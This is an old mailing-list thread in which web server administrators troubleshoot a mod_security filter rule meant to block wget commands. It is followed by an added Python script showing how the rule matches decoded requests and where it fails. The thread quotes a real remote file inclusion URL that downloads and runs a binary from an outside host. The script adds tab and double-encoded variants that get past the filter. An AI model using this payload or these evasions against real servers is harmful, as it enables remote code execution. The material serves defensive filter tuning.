Re: [mod-security-users] Problem with snort rules
From: Danny S. <dsh...@al...> - 2004-02-04 20:03:23
Yes, SecFilters are working. If I append a /bin/ps error on the end of it, I
get an error. Log file is also being written to.

On 2/4/04 2:53 PM, "L. Christopher Luther" <CL...@Xy...> wrote:

> Do any of the other SecFilter filters work? And a silly question, is your
> filtering actually turned on (SecFilterEngine On)?
>
> When I use the URL against one of my internal web servers (Apache Linux), I
> receive the following error:
>
> >>>>>>>>>>
> Internal Server Error
> The server encountered an internal error or misconfiguration and was unable
> to complete your request.
>
> Please contact the server administrator, xs...@xy... and inform
> them of the time the error occurred, and anything you might have done that
> may have caused the error.
>
> More information about this error may be available in the server error log.
> <<<<<<<<<<
>
> And when I check the logs, I see the following (IP addresses and names
> obfuscated):
>
> >>>>>>>>>>
> ========================================
> Request: x.x.x.x - - [[04/Feb/2004:14:48:25 --0500]] "GET /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1" 500 541
> Handler: (null)
> ----------------------------------------
> GET /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; brip1; .NET CLR 1.1.4322)
> Host: mysecret
> Connection: Keep-Alive
> mod_security-message: Access denied with code 500. Pattern match "wget\x20" at THE_REQUEST.
> mod_security-action: 500
>
> HTTP/1.1 500 Internal Server Error
> Content-Length: 541
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
> <<<<<<<<<<
>
> So it appears that my 'SecFilter "wget\x20"' is working.
>
> - Christopher
>
>
> -----Original Message-----
> From: Danny Shurett [mailto:dsh...@al...]
> Sent: Wednesday, February 04, 2004 2:20 PM
> To: mod...@li...
> Subject: [mod-security-users] Problem with snort rules
>
>
> I am working on getting my filters configured for a number of web servers. I
> used a few filters I found in the snort filters that were converted.
> However, upon further investigation, it didn't yield what I was looking for.
> Here is the one I think should be tripped:
>
> # WEB-ATTACKS wget command attempt
> SecFilter "wget\x20"
>
> Here is a real URL (slightly modified) that was used to attack a server.
>
> http://someplace.com?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi
>
> I would have expected the wget filter above to block it. Can anyone help
> me understand why the filter above doesn't block wget? Am I missing the
> point? Please be gentle. Thanks.
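The thread never settles why Danny's server let the request through, but Christopher's audit log shows the mechanism that makes the rule fire at all: the wire bytes contain `wget%20`, yet mod_security reports a match on `"wget\x20"` (a literal space) because it runs SecFilter patterns against the URL-decoded request, not the raw line. The script below is an added illustration, not code from the thread or from mod_security; the `normalize` function is an assumption that approximates mod_security 1.x's pre-match decoding with a single URL-decode pass, and the variant request lines (tab instead of space, double encoding, a benign path containing "wget") are constructed here to show where a literal-space rule stops matching.

```python
import re
from urllib.parse import unquote

# The rule from the thread as a PCRE-style pattern: \x20 is one literal space.
SECFILTER_WGET = re.compile(r"wget\x20")

# Constructed sample request lines (THE_REQUEST). The first is the request
# line from Christopher's audit log; the others are variants added here.
REQUESTS = {
    "thread_attack": (
        "GET /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?"
        "&cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;"
        "chmod%20711%20cgi;./cgi HTTP/1.1"
    ),
    # %09 is a tab: still a valid shell separator, but not \x20.
    "tab_instead_of_space": "GET /?cmd=wget%09http://hac10.tripod.com.br/cgi HTTP/1.1",
    # %2520 decodes once to %20, so a single decode pass never sees a space.
    "double_encoded": "GET /?cmd=wget%2520http://hac10.tripod.com.br/cgi HTTP/1.1",
    # "wget" with no following space: must not be flagged.
    "benign": "GET /docs/wget-manual.html HTTP/1.1",
}


def normalize(request_line: str) -> str:
    """Assumed approximation of mod_security 1.x normalization: one pass of
    percent-decoding. (Real 1.x also collapses path self-references and
    handles NUL bytes; neither affects these samples.)"""
    return unquote(request_line)


def inspect(request_line: str, engine_on: bool = True) -> dict:
    """Apply the SecFilter the way the engine does (to the normalized line)
    and also report what a grep over the raw access log would see.
    engine_on models SecFilterEngine On/Off: with it off, nothing is denied."""
    normalized = normalize(request_line)
    raw_hit = SECFILTER_WGET.search(request_line) is not None
    norm_hit = SECFILTER_WGET.search(normalized) is not None
    return {
        "raw_match": raw_hit,
        "normalized_match": norm_hit,
        # mod_security's default deny status in the thread is 500.
        "action": 500 if (engine_on and norm_hit) else None,
    }


if __name__ == "__main__":
    for name, line in REQUESTS.items():
        print(f"{name:22s} {inspect(line)}")
```

Two things fall out of running it. A grep for `wget ` over the raw access log misses the attack line (it only ever contains `wget%20`), which is why the audit log, not the access log, is the place to confirm a filter hit. And the rule is only as good as its literal space: a tab, a double-encoded `%2520`, or any other separator goes straight past it, so a rule of this shape is a tripwire for a specific exploit string rather than a general defence against remote-fetch-and-execute payloads.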